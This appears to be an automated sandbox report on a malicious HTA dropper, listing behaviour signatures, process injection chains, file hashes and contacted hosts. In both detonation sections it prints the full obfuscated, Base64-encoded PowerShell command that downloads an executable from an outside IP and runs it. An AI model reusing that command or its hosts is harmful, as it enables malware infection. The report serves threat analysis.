Malware Analysis Report

2024-12-07 16:48

Sample ID 241113-jcykbsxenh
Target seethebestthingswithgreatthingsbestthingswithgreatentry.hta
SHA256 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
Tags
defense_evasion discovery execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546

Threat Level: Likely malicious

The file seethebestthingswithgreatthingsbestthingswithgreatentry.hta was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution

Blocklisted process makes network request

Downloads MZ/PE file

Evasion via Device Credential Deployment

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

AutoIT Executable

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 07:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 07:32

Reported

2024-11-13 07:34

Platform

win7-20240903-en

Max time kernel

122s

Max time network

122s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wlanext.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2672 set thread context of 2300 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wlanext.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wlanext.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2440 wrote to memory of 2120 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2440 wrote to memory of 2120 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2440 wrote to memory of 2120 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2440 wrote to memory of 2120 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 548 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2120 wrote to memory of 548 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2120 wrote to memory of 548 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2120 wrote to memory of 548 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 548 wrote to memory of 1384 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 548 wrote to memory of 1384 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 548 wrote to memory of 1384 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 548 wrote to memory of 1384 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2120 wrote to memory of 2672 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 2120 wrote to memory of 2672 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 2120 wrote to memory of 2672 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 2120 wrote to memory of 2672 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 2672 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 2672 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 2672 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 2672 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 2672 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta"

C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE

"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\utu7hahj.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D33.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D32.tmp"

C:\Users\Admin\AppData\Roaming\wlanext.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

Network

Country Destination Domain Proto
US 107.173.4.61:80 107.173.4.61 tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 613d7cdc2b28524fb662528ebdfbf8d2
SHA1 ccbc1d360f44de08d51496e8aa9a97286665cc81
SHA256 b6c7ee152eca86efd07b20eb031036d300c448633037cb0a23ff1996afd219a1
SHA512 bd8e101cf662c80164caed51b07e5521ae3601bc2bfdbf73a67d8687a92efae18459be88af533f09efc49a6f8f7b3da0ecaafb543819e50794f4f12212fcec0e

\??\c:\Users\Admin\AppData\Local\Temp\utu7hahj.cmdline

MD5 d1237e9b54786c19a7dc2f3d5063ace9
SHA1 87fb71a3bf8b459d504e6fa64e64b3e090e0a340
SHA256 9683e7214772ac18f83fddce50409046d605f31f3259801cb9d9c10a2d9a2a0d
SHA512 a37f8622f2d5b7be68121530a31d6b987d8bae13c626d6bb5ffb25dfd121068133f03c61afff4b88e42788bf8c43650edc03d806cf0d5d1fefd7b9922886f373

\??\c:\Users\Admin\AppData\Local\Temp\utu7hahj.0.cs

MD5 4af98cbe7b888e1e92e1aa8a35732223
SHA1 75d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA512 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

\??\c:\Users\Admin\AppData\Local\Temp\CSC8D32.tmp

MD5 66d8d2dfe001de4d4e8f81fc35f06931
SHA1 6664cf4d0590f29de319bbb9890a85c2829b89ed
SHA256 3ab0fb6fd8f5d00eb6dbadb2f289f4dd6510d492cb0b7b20487a80716f6ebdf7
SHA512 152e09695ac3c88ca45dc03556329eb012e11f98e678a61fb0b852b6242b12e8ee08f66f055ab3ea5f8ddd2cbac6f054a1011f4bd51462a4346420c220101066

C:\Users\Admin\AppData\Local\Temp\RES8D33.tmp

MD5 f6382cf166635d79677234beb37053e5
SHA1 8579fc096080813fbfab3eed9e220b658d0f0de0
SHA256 37a7e10da6d118a316ec2762f7f5eef1f6e5dcc66f0f9e4c39e8aea5400e33d3
SHA512 b631a63fe7c62260591f6ee9993656fb135b01bcbbe066a43518c8a3a1d97380323da7f60362d79ff0b4ddd0d3e4855ce9d839fed4a2df04913b02d9e44a4b5b

C:\Users\Admin\AppData\Local\Temp\utu7hahj.dll

MD5 adf417c79e94d2cdce28073c4b2233af
SHA1 6ecce128a7d3cb7053efec9eb30da28b1bf6c56b
SHA256 e5a43b30261078a571d27c447cbd61ffcfb6a301e9b6f8144c22b72b54196870
SHA512 1d11c92bae92e4b7fad9837e223aca29350268142baf0dc52eae2034018b7be859e337ee30eb4c604149764c3f2dc5c1c2c7edf7134b1e664fd46749a67c9105

C:\Users\Admin\AppData\Local\Temp\utu7hahj.pdb

MD5 fb1f4a558fed58915412c8948ec94b77
SHA1 d92a257761de843867d4a2631074a197ce5fa8e3
SHA256 cb4f08215d951f1b2ed21d5cbc98523c3e2c6c67384c933500a42449d9aa236c
SHA512 754f0554e577d89202ca6d6905156b80abc624c463c1e4c6090baf9f8a75b66e33b18a070f9d860ae8b7520728066e07ac8e3084ff53742540817d32f6c707dd

C:\Users\Admin\AppData\Roaming\wlanext.exe

MD5 7423e3013a2ca93513e9f1024dfe1cc8
SHA1 525281537f75c168ca4015df438bb83a7784931a
SHA256 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df
SHA512 d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0

C:\Users\Admin\AppData\Local\Temp\juvenilely

MD5 5fc0e7bec89d9a4e021d88dd1cf731b2
SHA1 26ea02938cb1eb51a1ac601ab1b068a130cc3719
SHA256 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d
SHA512 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f

memory/2300-44-0x0000000000400000-0x0000000000447000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 07:32

Reported

2024-11-13 07:34

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wlanext.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 540 set thread context of 4744 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 4744 set thread context of 4368 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 4744 set thread context of 2060 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mstsc.exe
PID 2060 set thread context of 4368 N/A C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mshta.exe
PID 2060 set thread context of 1380 N/A C:\Windows\SysWOW64\mstsc.exe C:\Program Files\Mozilla Firefox\Firefox.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wlanext.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \Registry\User\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 C:\Windows\SysWOW64\mstsc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4368 wrote to memory of 860 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 4368 wrote to memory of 860 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 4368 wrote to memory of 860 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
PID 860 wrote to memory of 1632 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 860 wrote to memory of 1632 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 860 wrote to memory of 1632 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 860 wrote to memory of 4108 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 860 wrote to memory of 4108 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 860 wrote to memory of 4108 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4108 wrote to memory of 3324 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4108 wrote to memory of 3324 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4108 wrote to memory of 3324 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 860 wrote to memory of 540 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 860 wrote to memory of 540 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 860 wrote to memory of 540 N/A C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE C:\Users\Admin\AppData\Roaming\wlanext.exe
PID 540 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 540 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 540 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 540 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Roaming\wlanext.exe C:\Windows\SysWOW64\svchost.exe
PID 4368 wrote to memory of 2060 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mstsc.exe
PID 4368 wrote to memory of 2060 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mstsc.exe
PID 4368 wrote to memory of 2060 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mstsc.exe
PID 2060 wrote to memory of 1380 N/A C:\Windows\SysWOW64\mstsc.exe C:\Program Files\Mozilla Firefox\Firefox.exe
PID 2060 wrote to memory of 1380 N/A C:\Windows\SysWOW64\mstsc.exe C:\Program Files\Mozilla Firefox\Firefox.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingsbestthingswithgreatentry.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE

"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lzzzoozl\lzzzoozl.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCDEF.tmp" "c:\Users\Admin\AppData\Local\Temp\lzzzoozl\CSC5E4A05AEE662450799A3E9EDCFB70B1.TMP"

C:\Users\Admin\AppData\Roaming\wlanext.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\AppData\Roaming\wlanext.exe"

C:\Windows\SysWOW64\mstsc.exe

"C:\Windows\SysWOW64\mstsc.exe"

C:\Program Files\Mozilla Firefox\Firefox.exe

"C:\Program Files\Mozilla Firefox\Firefox.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 107.173.4.61:80 107.173.4.61 tcp
US 8.8.8.8:53 61.4.173.107.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.sodatool.site udp
CN 122.152.214.209:80 www.sodatool.site tcp
US 8.8.8.8:53 www.wwwzbk.app udp
HK 202.95.12.144:80 www.wwwzbk.app tcp
US 8.8.8.8:53 144.12.95.202.in-addr.arpa udp
US 8.8.8.8:53 www.fichier-nt-pdf.store udp
LT 84.32.84.32:80 www.fichier-nt-pdf.store tcp
